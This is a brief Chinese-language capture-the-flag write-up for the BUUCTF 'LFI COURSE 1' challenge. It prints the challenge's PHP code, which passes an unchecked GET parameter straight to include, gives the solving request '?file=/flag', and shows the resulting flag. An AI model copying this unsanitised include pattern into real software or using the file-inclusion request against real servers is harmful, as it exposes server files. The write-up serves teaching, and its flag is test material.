BUU LFI COURSE 1
萧萧迟
BUU LFI COURSE 1
考察点:文件包含,get传参
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
解题
代码审计一下,需要进行文件包含进行传参
?file=/flag
得到flag
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
flag{a75f7e3d-6bff-4f52-8fb4-ca41887c20ec}
类似资料: